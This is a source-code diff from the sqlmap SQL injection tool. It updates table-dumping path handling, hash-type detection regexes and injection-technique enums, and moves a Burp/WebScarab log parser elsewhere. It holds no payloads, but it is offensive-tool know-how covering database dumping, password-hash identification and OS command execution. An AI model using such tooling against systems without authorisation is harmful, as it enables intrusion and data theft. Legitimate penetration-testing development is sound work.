||||||
|
|
||||||
if conf.api:
|
if conf.api:
|
||||||
self._write(userSettings, content_type=content_type)
|
self._write(userSettings, content_type=content_type)
|
||||||
@@ -285,7 +286,7 @@ class Dump(object):
|
|||||||
colType = None
|
colType = None
|
||||||
|
|
||||||
colList = columns.keys()
|
colList = columns.keys()
|
||||||
colList.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
colList.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
|
||||||
|
|
||||||
for column in colList:
|
for column in colList:
|
||||||
colType = columns[column]
|
colType = columns[column]
|
||||||
@@ -377,7 +378,7 @@ class Dump(object):
|
|||||||
if count is None:
|
if count is None:
|
||||||
count = "Unknown"
|
count = "Unknown"
|
||||||
|
|
||||||
tables.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
tables.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
|
||||||
|
|
||||||
for table in tables:
|
for table in tables:
|
||||||
blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or unicode(table)))
|
blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or unicode(table)))
|
||||||
@@ -414,16 +415,16 @@ class Dump(object):
|
|||||||
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
||||||
if not os.path.isdir(dumpDbPath):
|
if not os.path.isdir(dumpDbPath):
|
||||||
try:
|
try:
|
||||||
os.makedirs(dumpDbPath, 0755)
|
os.makedirs(dumpDbPath)
|
||||||
except:
|
except:
|
||||||
warnFile = True
|
warnFile = True
|
||||||
|
|
||||||
_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
|
_ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db)))
|
||||||
dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
|
dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
|
||||||
|
|
||||||
if not os.path.isdir(dumpDbPath):
|
if not os.path.isdir(dumpDbPath):
|
||||||
try:
|
try:
|
||||||
os.makedirs(dumpDbPath, 0755)
|
os.makedirs(dumpDbPath)
|
||||||
except Exception, ex:
|
except Exception, ex:
|
||||||
try:
|
try:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
|
||||||
@@ -441,7 +442,7 @@ class Dump(object):
|
|||||||
|
|
||||||
dumpDbPath = tempDir
|
dumpDbPath = tempDir
|
||||||
|
|
||||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
|
dumpFileName = os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())))
|
||||||
if not checkFile(dumpFileName, False):
|
if not checkFile(dumpFileName, False):
|
||||||
try:
|
try:
|
||||||
openFile(dumpFileName, "w+b").close()
|
openFile(dumpFileName, "w+b").close()
|
||||||
@@ -450,9 +451,9 @@ class Dump(object):
|
|||||||
except:
|
except:
|
||||||
warnFile = True
|
warnFile = True
|
||||||
|
|
||||||
_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
|
_ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
|
||||||
if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
|
if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
|
||||||
_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
|
_ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table)))
|
||||||
dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
|
dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
|
||||||
else:
|
else:
|
||||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
|
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
|
||||||
@@ -611,9 +612,9 @@ class Dump(object):
|
|||||||
mimetype = magic.from_buffer(value, mime=True)
|
mimetype = magic.from_buffer(value, mime=True)
|
||||||
if any(mimetype.startswith(_) for _ in ("application", "image")):
|
if any(mimetype.startswith(_) for _ in ("application", "image")):
|
||||||
if not os.path.isdir(dumpDbPath):
|
if not os.path.isdir(dumpDbPath):
|
||||||
os.makedirs(dumpDbPath, 0755)
|
os.makedirs(dumpDbPath)
|
||||||
|
|
||||||
_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
|
_ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
|
||||||
filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8)))
|
filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8)))
|
||||||
warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
|
warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
class PRIORITY:
|
class PRIORITY:
|
||||||
@@ -22,6 +22,15 @@ class SORT_ORDER:
|
|||||||
FIFTH = 4
|
FIFTH = 4
|
||||||
LAST = 100
|
LAST = 100
|
||||||
|
|
||||||
|
# Reference: https://docs.python.org/2/library/logging.html#logging-levels
|
||||||
|
class LOGGING_LEVELS:
|
||||||
|
NOTSET = 0
|
||||||
|
DEBUG = 10
|
||||||
|
INFO = 20
|
||||||
|
WARNING = 30
|
||||||
|
ERROR = 40
|
||||||
|
CRITICAL = 50
|
||||||
|
|
||||||
class DBMS:
|
class DBMS:
|
||||||
ACCESS = "Microsoft Access"
|
ACCESS = "Microsoft Access"
|
||||||
DB2 = "IBM DB2"
|
DB2 = "IBM DB2"
|
||||||
@@ -118,14 +127,30 @@ class HASH:
|
|||||||
MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z'
|
MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z'
|
||||||
MSSQL_NEW = r'(?i)\A0x0200[0-9a-f]{8}[0-9a-f]{128}\Z'
|
MSSQL_NEW = r'(?i)\A0x0200[0-9a-f]{8}[0-9a-f]{128}\Z'
|
||||||
ORACLE = r'(?i)\As:[0-9a-f]{60}\Z'
|
ORACLE = r'(?i)\As:[0-9a-f]{60}\Z'
|
||||||
ORACLE_OLD = r'(?i)\A[01-9a-f]{16}\Z'
|
ORACLE_OLD = r'(?i)\A[0-9a-f]{16}\Z'
|
||||||
MD5_GENERIC = r'(?i)\A[0-9a-f]{32}\Z'
|
MD5_GENERIC = r'(?i)\A[0-9a-f]{32}\Z'
|
||||||
SHA1_GENERIC = r'(?i)\A[0-9a-f]{40}\Z'
|
SHA1_GENERIC = r'(?i)\A[0-9a-f]{40}\Z'
|
||||||
SHA224_GENERIC = r'(?i)\A[0-9a-f]{28}\Z'
|
SHA224_GENERIC = r'(?i)\A[0-9a-f]{56}\Z'
|
||||||
SHA384_GENERIC = r'(?i)\A[0-9a-f]{48}\Z'
|
SHA256_GENERIC = r'(?i)\A[0-9a-f]{64}\Z'
|
||||||
SHA512_GENERIC = r'(?i)\A[0-9a-f]{64}\Z'
|
SHA384_GENERIC = r'(?i)\A[0-9a-f]{96}\Z'
|
||||||
CRYPT_GENERIC = r'(?i)\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z'
|
SHA512_GENERIC = r'(?i)\A[0-9a-f]{128}\Z'
|
||||||
WORDPRESS = r'(?i)\A\$P\$[./0-9A-Za-z]{31}\Z'
|
CRYPT_GENERIC = r'\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z'
|
||||||
|
JOOMLA = r'\A[0-9a-f]{32}:\w{32}\Z'
|
||||||
|
WORDPRESS = r'\A\$P\$[./0-9a-zA-Z]{31}\Z'
|
||||||
|
APACHE_MD5_CRYPT = r'\A\$apr1\$.{1,8}\$[./a-zA-Z0-9]+\Z'
|
||||||
|
UNIX_MD5_CRYPT = r'\A\$1\$.{1,8}\$[./a-zA-Z0-9]+\Z'
|
||||||
|
APACHE_SHA1 = r'\A\{SHA\}[a-zA-Z0-9+/]+={0,2}\Z'
|
||||||
|
VBULLETIN = r'\A[0-9a-fA-F]{32}:.{30}\Z'
|
||||||
|
VBULLETIN_OLD = r'\A[0-9a-fA-F]{32}:.{3}\Z'
|
||||||
|
SSHA = r'\A\{SSHA\}[a-zA-Z0-9+/]+={0,2}\Z'
|
||||||
|
SSHA256 = r'\A\{SSHA256\}[a-zA-Z0-9+/]+={0,2}\Z'
|
||||||
|
SSHA512 = r'\A\{SSHA512\}[a-zA-Z0-9+/]+={0,2}\Z'
|
||||||
|
DJANGO_MD5 = r'\Amd5\$[^$]+\$[0-9a-f]{32}\Z'
|
||||||
|
DJANGO_SHA1 = r'\Asha1\$[^$]+\$[0-9a-f]{40}\Z'
|
||||||
|
MD5_BASE64 = r'\A[a-zA-Z0-9+/]{22}==\Z'
|
||||||
|
SHA1_BASE64 = r'\A[a-zA-Z0-9+/]{27}=\Z'
|
||||||
|
SHA256_BASE64 = r'\A[a-zA-Z0-9+/]{43}=\Z'
|
||||||
|
SHA512_BASE64 = r'\A[a-zA-Z0-9+/]{86}==\Z'
|
||||||
|
|
||||||
# Reference: http://www.zytrax.com/tech/web/mobile_ids.html
|
# Reference: http://www.zytrax.com/tech/web/mobile_ids.html
|
||||||
class MOBILES:
|
class MOBILES:
|
||||||
@@ -184,6 +209,7 @@ class HTTP_HEADER:
|
|||||||
USER_AGENT = "User-Agent"
|
USER_AGENT = "User-Agent"
|
||||||
VIA = "Via"
|
VIA = "Via"
|
||||||
X_POWERED_BY = "X-Powered-By"
|
X_POWERED_BY = "X-Powered-By"
|
||||||
|
X_DATA_ORIGIN = "X-Data-Origin"
|
||||||
|
|
||||||
class EXPECTED:
|
class EXPECTED:
|
||||||
BOOL = "bool"
|
BOOL = "bool"
|
||||||
@@ -216,40 +242,40 @@ class REDIRECTION:
|
|||||||
|
|
||||||
class PAYLOAD:
|
class PAYLOAD:
|
||||||
SQLINJECTION = {
|
SQLINJECTION = {
|
||||||
1: "boolean-based blind",
|
1: "boolean-based blind",
|
||||||
2: "error-based",
|
2: "error-based",
|
||||||
3: "inline query",
|
3: "inline query",
|
||||||
4: "stacked queries",
|
4: "stacked queries",
|
||||||
5: "AND/OR time-based blind",
|
5: "AND/OR time-based blind",
|
||||||
6: "UNION query",
|
6: "UNION query",
|
||||||
}
|
}
|
||||||
|
|
||||||
PARAMETER = {
|
PARAMETER = {
|
||||||
1: "Unescaped numeric",
|
1: "Unescaped numeric",
|
||||||
2: "Single quoted string",
|
2: "Single quoted string",
|
||||||
3: "LIKE single quoted string",
|
3: "LIKE single quoted string",
|
||||||
4: "Double quoted string",
|
4: "Double quoted string",
|
||||||
5: "LIKE double quoted string",
|
5: "LIKE double quoted string",
|
||||||
}
|
}
|
||||||
|
|
||||||
RISK = {
|
RISK = {
|
||||||
0: "No risk",
|
0: "No risk",
|
||||||
1: "Low risk",
|
1: "Low risk",
|
||||||
2: "Medium risk",
|
2: "Medium risk",
|
||||||
3: "High risk",
|
3: "High risk",
|
||||||
}
|
}
|
||||||
|
|
||||||
CLAUSE = {
|
CLAUSE = {
|
||||||
0: "Always",
|
0: "Always",
|
||||||
1: "WHERE",
|
1: "WHERE",
|
||||||
2: "GROUP BY",
|
2: "GROUP BY",
|
||||||
3: "ORDER BY",
|
3: "ORDER BY",
|
||||||
4: "LIMIT",
|
4: "LIMIT",
|
||||||
5: "OFFSET",
|
5: "OFFSET",
|
||||||
6: "TOP",
|
6: "TOP",
|
||||||
7: "Table name",
|
7: "Table name",
|
||||||
8: "Column name",
|
8: "Column name",
|
||||||
}
|
}
|
||||||
|
|
||||||
class METHOD:
|
class METHOD:
|
||||||
COMPARISON = "comparison"
|
COMPARISON = "comparison"
|
||||||
@@ -314,34 +340,6 @@ class CONTENT_TYPE:
|
|||||||
OS_CMD = 24
|
OS_CMD = 24
|
||||||
REG_READ = 25
|
REG_READ = 25
|
||||||
|
|
||||||
PART_RUN_CONTENT_TYPES = {
|
|
||||||
"checkDbms": CONTENT_TYPE.TECHNIQUES,
|
|
||||||
"getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
|
|
||||||
"getBanner": CONTENT_TYPE.BANNER,
|
|
||||||
"getCurrentUser": CONTENT_TYPE.CURRENT_USER,
|
|
||||||
"getCurrentDb": CONTENT_TYPE.CURRENT_DB,
|
|
||||||
"getHostname": CONTENT_TYPE.HOSTNAME,
|
|
||||||
"isDba": CONTENT_TYPE.IS_DBA,
|
|
||||||
"getUsers": CONTENT_TYPE.USERS,
|
|
||||||
"getPasswordHashes": CONTENT_TYPE.PASSWORDS,
|
|
||||||
"getPrivileges": CONTENT_TYPE.PRIVILEGES,
|
|
||||||
"getRoles": CONTENT_TYPE.ROLES,
|
|
||||||
"getDbs": CONTENT_TYPE.DBS,
|
|
||||||
"getTables": CONTENT_TYPE.TABLES,
|
|
||||||
"getColumns": CONTENT_TYPE.COLUMNS,
|
|
||||||
"getSchema": CONTENT_TYPE.SCHEMA,
|
|
||||||
"getCount": CONTENT_TYPE.COUNT,
|
|
||||||
"dumpTable": CONTENT_TYPE.DUMP_TABLE,
|
|
||||||
"search": CONTENT_TYPE.SEARCH,
|
|
||||||
"sqlQuery": CONTENT_TYPE.SQL_QUERY,
|
|
||||||
"tableExists": CONTENT_TYPE.COMMON_TABLES,
|
|
||||||
"columnExists": CONTENT_TYPE.COMMON_COLUMNS,
|
|
||||||
"readFile": CONTENT_TYPE.FILE_READ,
|
|
||||||
"writeFile": CONTENT_TYPE.FILE_WRITE,
|
|
||||||
"osCmd": CONTENT_TYPE.OS_CMD,
|
|
||||||
"regRead": CONTENT_TYPE.REG_READ
|
|
||||||
}
|
|
||||||
|
|
||||||
class CONTENT_STATUS:
|
class CONTENT_STATUS:
|
||||||
IN_PROGRESS = 0
|
IN_PROGRESS = 0
|
||||||
COMPLETE = 1
|
COMPLETE = 1
|
||||||
@@ -356,6 +354,7 @@ class AUTOCOMPLETE_TYPE:
|
|||||||
SQL = 0
|
SQL = 0
|
||||||
OS = 1
|
OS = 1
|
||||||
SQLMAP = 2
|
SQLMAP = 2
|
||||||
|
API = 3
|
||||||
|
|
||||||
class NOTE:
|
class NOTE:
|
||||||
FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable"
|
FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable"
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
class SqlmapBaseException(Exception):
|
class SqlmapBaseException(Exception):
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import logging
|
import logging
|
||||||
|
|||||||
437
lib/core/option.py
Executable file → Normal file
437
lib/core/option.py
Executable file → Normal file
@@ -1,16 +1,14 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import binascii
|
|
||||||
import cookielib
|
import cookielib
|
||||||
import glob
|
import glob
|
||||||
import inspect
|
import inspect
|
||||||
import logging
|
import logging
|
||||||
import httplib
|
|
||||||
import os
|
import os
|
||||||
import random
|
import random
|
||||||
import re
|
import re
|
||||||
@@ -37,17 +35,15 @@ from lib.core.common import checkFile
|
|||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
from lib.core.common import getPublicTypeMembers
|
from lib.core.common import getPublicTypeMembers
|
||||||
from lib.core.common import getSafeExString
|
from lib.core.common import getSafeExString
|
||||||
from lib.core.common import extractRegexResult
|
|
||||||
from lib.core.common import filterStringValue
|
|
||||||
from lib.core.common import findLocalPort
|
from lib.core.common import findLocalPort
|
||||||
from lib.core.common import findPageForms
|
from lib.core.common import findPageForms
|
||||||
from lib.core.common import getConsoleWidth
|
from lib.core.common import getConsoleWidth
|
||||||
from lib.core.common import getFileItems
|
from lib.core.common import getFileItems
|
||||||
from lib.core.common import getFileType
|
from lib.core.common import getFileType
|
||||||
from lib.core.common import getUnicode
|
|
||||||
from lib.core.common import normalizePath
|
from lib.core.common import normalizePath
|
||||||
from lib.core.common import ntToPosixSlashes
|
from lib.core.common import ntToPosixSlashes
|
||||||
from lib.core.common import openFile
|
from lib.core.common import openFile
|
||||||
|
from lib.core.common import parseRequestFile
|
||||||
from lib.core.common import parseTargetDirect
|
from lib.core.common import parseTargetDirect
|
||||||
from lib.core.common import parseTargetUrl
|
from lib.core.common import parseTargetUrl
|
||||||
from lib.core.common import paths
|
from lib.core.common import paths
|
||||||
@@ -58,6 +54,7 @@ from lib.core.common import resetCookieJar
|
|||||||
from lib.core.common import runningAsAdmin
|
from lib.core.common import runningAsAdmin
|
||||||
from lib.core.common import safeExpandUser
|
from lib.core.common import safeExpandUser
|
||||||
from lib.core.common import saveConfig
|
from lib.core.common import saveConfig
|
||||||
|
from lib.core.common import setColor
|
||||||
from lib.core.common import setOptimize
|
from lib.core.common import setOptimize
|
||||||
from lib.core.common import setPaths
|
from lib.core.common import setPaths
|
||||||
from lib.core.common import singleTimeWarnMessage
|
from lib.core.common import singleTimeWarnMessage
|
||||||
@@ -100,10 +97,7 @@ from lib.core.exception import SqlmapUnsupportedDBMSException
|
|||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.log import FORMATTER
|
from lib.core.log import FORMATTER
|
||||||
from lib.core.optiondict import optDict
|
from lib.core.optiondict import optDict
|
||||||
from lib.core.settings import BURP_REQUEST_REGEX
|
|
||||||
from lib.core.settings import BURP_XML_HISTORY_REGEX
|
|
||||||
from lib.core.settings import CODECS_LIST_PAGE
|
from lib.core.settings import CODECS_LIST_PAGE
|
||||||
from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
|
|
||||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||||
from lib.core.settings import DBMS_ALIASES
|
from lib.core.settings import DBMS_ALIASES
|
||||||
from lib.core.settings import DEFAULT_PAGE_ENCODING
|
from lib.core.settings import DEFAULT_PAGE_ENCODING
|
||||||
@@ -120,7 +114,6 @@ from lib.core.settings import MAX_NUMBER_OF_THREADS
|
|||||||
from lib.core.settings import NULL
|
from lib.core.settings import NULL
|
||||||
from lib.core.settings import PARAMETER_SPLITTING_REGEX
|
from lib.core.settings import PARAMETER_SPLITTING_REGEX
|
||||||
from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT
|
from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT
|
||||||
from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
|
|
||||||
from lib.core.settings import SITE
|
from lib.core.settings import SITE
|
||||||
from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE
|
from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE
|
||||||
from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
|
from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
|
||||||
@@ -132,7 +125,6 @@ from lib.core.settings import UNION_CHAR_REGEX
|
|||||||
from lib.core.settings import UNKNOWN_DBMS_VERSION
|
from lib.core.settings import UNKNOWN_DBMS_VERSION
|
||||||
from lib.core.settings import URI_INJECTABLE_REGEX
|
from lib.core.settings import URI_INJECTABLE_REGEX
|
||||||
from lib.core.settings import VERSION_STRING
|
from lib.core.settings import VERSION_STRING
|
||||||
from lib.core.settings import WEBSCARAB_SPLITTER
|
|
||||||
from lib.core.threads import getCurrentThreadData
|
from lib.core.threads import getCurrentThreadData
|
||||||
from lib.core.threads import setDaemon
|
from lib.core.threads import setDaemon
|
||||||
from lib.core.update import update
|
from lib.core.update import update
|
||||||
@@ -174,201 +166,6 @@ try:
|
|||||||
except NameError:
|
except NameError:
|
||||||
WindowsError = None
|
WindowsError = None
|
||||||
|
|
||||||
def _feedTargetsDict(reqFile, addedTargetUrls):
|
|
||||||
"""
|
|
||||||
Parses web scarab and burp logs and adds results to the target URL list
|
|
||||||
"""
|
|
||||||
|
|
||||||
def _parseWebScarabLog(content):
|
|
||||||
"""
|
|
||||||
Parses web scarab logs (POST method not supported)
|
|
||||||
"""
|
|
||||||
|
|
||||||
reqResList = content.split(WEBSCARAB_SPLITTER)
|
|
||||||
|
|
||||||
for request in reqResList:
|
|
||||||
url = extractRegexResult(r"URL: (?P<result>.+?)\n", request, re.I)
|
|
||||||
method = extractRegexResult(r"METHOD: (?P<result>.+?)\n", request, re.I)
|
|
||||||
cookie = extractRegexResult(r"COOKIE: (?P<result>.+?)\n", request, re.I)
|
|
||||||
|
|
||||||
if not method or not url:
|
|
||||||
logger.debug("not a valid WebScarab log data")
|
|
||||||
continue
|
|
||||||
|
|
||||||
if method.upper() == HTTPMETHOD.POST:
|
|
||||||
warnMsg = "POST requests from WebScarab logs aren't supported "
|
|
||||||
warnMsg += "as their body content is stored in separate files. "
|
|
||||||
warnMsg += "Nevertheless you can use -r to load them individually."
|
|
||||||
logger.warning(warnMsg)
|
|
||||||
continue
|
|
||||||
|
|
||||||
if not(conf.scope and not re.search(conf.scope, url, re.I)):
|
|
||||||
if not kb.targets or url not in addedTargetUrls:
|
|
||||||
kb.targets.add((url, method, None, cookie, None))
|
|
||||||
addedTargetUrls.add(url)
|
|
||||||
|
|
||||||
def _parseBurpLog(content):
|
|
||||||
"""
|
|
||||||
Parses burp logs
|
|
||||||
"""
|
|
||||||
|
|
||||||
if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S):
|
|
||||||
if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
|
|
||||||
reqResList = []
|
|
||||||
for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
|
|
||||||
port, request = match.groups()
|
|
||||||
try:
|
|
||||||
request = request.decode("base64")
|
|
||||||
except binascii.Error:
|
|
||||||
continue
|
|
||||||
_ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request)
|
|
||||||
if _:
|
|
||||||
host = _.group(0).strip()
|
|
||||||
if not re.search(r":\d+\Z", host):
|
|
||||||
request = request.replace(host, "%s:%d" % (host, int(port)))
|
|
||||||
reqResList.append(request)
|
|
||||||
else:
|
|
||||||
reqResList = [content]
|
|
||||||
else:
|
|
||||||
reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S)
|
|
||||||
|
|
||||||
for match in reqResList:
|
|
||||||
request = match if isinstance(match, basestring) else match.group(0)
|
|
||||||
request = re.sub(r"\A[^\w]+", "", request)
|
|
||||||
|
|
||||||
schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S)
|
|
||||||
|
|
||||||
if schemePort:
|
|
||||||
scheme = schemePort.group(1)
|
|
||||||
port = schemePort.group(2)
|
|
||||||
request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip())
|
|
||||||
else:
|
|
||||||
scheme, port = None, None
|
|
||||||
|
|
||||||
if not re.search(r"^[\n]*(%s).*?\sHTTP\/" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), request, re.I | re.M):
|
|
||||||
continue
|
|
||||||
|
|
||||||
if re.search(r"^[\n]*%s.*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M):
|
|
||||||
continue
|
|
||||||
|
|
||||||
getPostReq = False
|
|
||||||
url = None
|
|
||||||
host = None
|
|
||||||
method = None
|
|
||||||
data = None
|
|
||||||
cookie = None
|
|
||||||
params = False
|
|
||||||
newline = None
|
|
||||||
lines = request.split('\n')
|
|
||||||
headers = []
|
|
||||||
|
|
||||||
for index in xrange(len(lines)):
|
|
||||||
line = lines[index]
|
|
||||||
|
|
||||||
if not line.strip() and index == len(lines) - 1:
|
|
||||||
break
|
|
||||||
|
|
||||||
newline = "\r\n" if line.endswith('\r') else '\n'
|
|
||||||
line = line.strip('\r')
|
|
||||||
match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
|
|
||||||
|
|
||||||
if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
|
|
||||||
data = ""
|
|
||||||
params = True
|
|
||||||
|
|
||||||
elif match:
|
|
||||||
method = match.group(1)
|
|
||||||
url = match.group(2)
|
|
||||||
|
|
||||||
if any(_ in line for _ in ('?', '=', kb.customInjectionMark)):
|
|
||||||
params = True
|
|
||||||
|
|
||||||
getPostReq = True
|
|
||||||
|
|
||||||
# POST parameters
|
|
||||||
elif data is not None and params:
|
|
||||||
data += "%s%s" % (line, newline)
|
|
||||||
|
|
||||||
# GET parameters
|
|
||||||
elif "?" in line and "=" in line and ": " not in line:
|
|
||||||
params = True
|
|
||||||
|
|
||||||
# Headers
|
|
||||||
elif re.search(r"\A\S+:", line):
|
|
||||||
key, value = line.split(":", 1)
|
|
||||||
value = value.strip().replace("\r", "").replace("\n", "")
|
|
||||||
|
|
||||||
# Cookie and Host headers
|
|
||||||
if key.upper() == HTTP_HEADER.COOKIE.upper():
|
|
||||||
cookie = value
|
|
||||||
elif key.upper() == HTTP_HEADER.HOST.upper():
|
|
||||||
if '://' in value:
|
|
||||||
scheme, value = value.split('://')[:2]
|
|
||||||
splitValue = value.split(":")
|
|
||||||
host = splitValue[0]
|
|
||||||
|
|
||||||
if len(splitValue) > 1:
|
|
||||||
port = filterStringValue(splitValue[1], "[0-9]")
|
|
||||||
|
|
||||||
# Avoid to add a static content length header to
|
|
||||||
# headers and consider the following lines as
|
|
||||||
# POSTed data
|
|
||||||
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
|
|
||||||
params = True
|
|
||||||
|
|
||||||
# Avoid proxy and connection type related headers
|
|
||||||
elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
|
|
||||||
headers.append((getUnicode(key), getUnicode(value)))
|
|
||||||
|
|
||||||
if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
|
|
||||||
params = True
|
|
||||||
|
|
||||||
data = data.rstrip("\r\n") if data else data
|
|
||||||
|
|
||||||
if getPostReq and (params or cookie):
|
|
||||||
if not port and isinstance(scheme, basestring) and scheme.lower() == "https":
|
|
||||||
port = "443"
|
|
||||||
elif not scheme and port == "443":
|
|
||||||
scheme = "https"
|
|
||||||
|
|
||||||
if conf.forceSSL:
|
|
||||||
scheme = "https"
|
|
||||||
port = port or "443"
|
|
||||||
|
|
||||||
if not host:
|
|
||||||
errMsg = "invalid format of a request file"
|
|
||||||
raise SqlmapSyntaxException, errMsg
|
|
||||||
|
|
||||||
if not url.startswith("http"):
|
|
||||||
url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url)
|
|
||||||
scheme = None
|
|
||||||
port = None
|
|
||||||
|
|
||||||
if not(conf.scope and not re.search(conf.scope, url, re.I)):
|
|
||||||
if not kb.targets or url not in addedTargetUrls:
|
|
||||||
kb.targets.add((url, conf.method or method, data, cookie, tuple(headers)))
